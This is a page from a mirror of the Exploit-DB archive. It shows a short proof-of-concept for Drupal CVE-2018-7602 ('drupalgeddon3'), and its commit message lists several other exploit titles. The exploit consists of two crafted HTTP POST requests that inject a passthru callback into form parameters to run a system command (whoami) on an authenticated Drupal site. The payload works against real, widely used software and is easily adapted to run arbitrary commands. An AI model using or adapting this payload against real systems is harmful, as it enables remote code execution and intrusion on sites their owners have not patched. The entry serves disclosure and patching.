bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1
exploit-db-mirror/exploits/php/webapps/44542.txt
Offensive Security b1f00227f1 DB: 2018-04-27 
12 changes to exploits/shellcodes

Free Download Manager 2.0 Built 417 - Local Buffer Overflow (SEH)

Allok AVI to DVD SVCD VCD Converter 4.0.1217 - Buffer Overflow (SEH)

Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow

Shopy Point of Sale v1.0 - CSV Injection
Shopy Point of Sale 1.0 - CSV Injection

Drupal < 7.58 - 'drupalgeddon3' Authenticated Remote Code Execution (PoC)
Blog Master Pro v1.0 - CSV Injection
HRSALE The Ultimate HRM v1.0.2 - CSV Injection
HRSALE The Ultimate HRM v1.0.2 - 'award_id' SQL Injection
Blog Master Pro 1.0 - CSV Injection
HRSALE The Ultimate HRM 1.0.2 - CSV Injection
HRSALE The Ultimate HRM 1.0.2 - 'award_id' SQL Injection

HRSALE The Ultimate HRM v1.0.2 - Local File Inclusion
HRSALE The Ultimate HRM 1.0.2 - Local File Inclusion
Jfrog Artifactory < 4.16 - Unauthenticated Arbitrary File Upload / Remote Command Execution
WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion
SickRage < v2018.03.09 - Clear-Text Credentials HTTP Response
October CMS User Plugin 1.4.5 - Persistent Cross-Site Scripting
MyBB Threads to Link Plugin 1.3 - Cross-Site Scripting
GitList 0.6 - Unauthenticated Remote Code Execution
TP-Link Technologies TL-WA850RE Wi-Fi Range Extender - Unauthenticated Remote Reboot
Frog CMS 0.9.5 - Persistent Cross-Site Scripting
2018-04-27 05:01:49 +00:00

18 lines
No EOL
770 B
Text
Raw Blame History

This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602.
You must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm).
POST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1
[...]
form_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]
Retrieve the form_build_id from the response, and then triggering the exploit with :
POST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1
[...]
form_build_id=[FORM_BUILD_ID]
This will display the result of the whoami command.
Patch your systems!
Blaklis
Reference in a new issue View git blame Copy permalink